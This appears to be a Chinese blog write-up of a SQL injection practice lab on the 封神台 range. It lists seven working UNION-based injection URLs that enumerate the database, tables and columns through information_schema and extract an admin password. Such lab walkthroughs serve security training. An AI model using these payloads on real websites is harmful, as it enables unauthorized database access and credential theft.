一次简单的通过sql注入获取目标用户名和密码的流程

靶场环境:封神台

第一步

http://59.63.200.79:8003/?id=2-1
验证注入点存在

第二步

http://59.63.200.79:8003/?id=1 order by 1/2/…
查询到长度为2

第三步

http://59.63.200.79:8003/?id=9.99 union select 1,2
验证数据返回点,返回值为2

第四步

http://59.63.200.79:8003/?id=9.99 union select 1,database()
查询到库名为maoshe

第五步

http://59.63.200.79:8003/?id=9.99 union select 1,table_name from information_schema.tables where table_schema=database()
查询到maoshe库下的表名
admin
dirs
news
xss

第六步

http://59.63.200.79:8003/?id=9.99 union select 1,column_name from information_schema.columns where table_name=‘admin’ and table_schema=database()
查询到admin表下字段名 #group_concat(column_name)
id
username
password

第七步

http://59.63.200.79:8003/?id=9.99 union select 1,password from admin
查询到admin下用户名和密码分别为
admin
hellohack

  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值